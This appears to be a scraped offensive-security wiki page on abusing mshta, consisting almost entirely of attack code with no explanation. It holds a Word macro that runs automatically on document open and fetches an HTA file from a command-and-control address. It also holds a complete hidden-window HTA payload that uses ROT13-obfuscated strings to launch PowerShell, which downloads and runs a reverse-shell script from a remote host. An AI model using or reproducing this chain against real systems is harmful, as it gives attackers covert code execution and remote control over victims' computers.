hta
Abuse


References
Last updated
Sub AutoOpen()
Shell "C:\Windows\System32\mshta.exe http://'<c2-address>'/mal.hta"
End Sub<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION
ID="SilentHTA"
APPLICATIONNAME="Silent"
WINDOWSTATE="invisible"
SHOWINTASKBAR="no"
CAPTION="no"
SYSMENU="no"
SCROLL="no"
SINGLEINSTANCE="yes"
/>
<meta http-equiv="x-ua-compatible" content="IE=11" />
<script language="JScript">
window.resizeTo(0, 0);
window.moveTo(-2000, -2000);
document.body.style.display = "none";
var alph = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
var ranalph = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm";
var num = "0123456789";
var sym = "/$:;-\\%#*&!. ";
function scram(s) {
var r = "";
for (var i = 0; i < s.length; i++) {
var found = false;
for (var j = 0; j < alph.length; j++) {
if (s.charAt(i) == alph.charAt(j)) {
r += ranalph.charAt(j);
found = true;
break;
}
}
if (!found) {
r += s.charAt(i);
}
}
return r;
}
var shellObj = new ActiveXObject(scram("Jfpevcg.Furyy"));
var encCmd = "cbjrefuryy.rkr -p \"\"vRk (aRj-bOwRpG aRg.JrOpYvRaG).QbJaYbNqFgEvAt('UgGc://192.168.0.103:1005/erirefr.cf1')\"\"";
shellObj.Run(scram(encCmd), 0, false);
setTimeout(function(){ self.close(); }, 1000);
</script>
</head>
<body></body>
</html>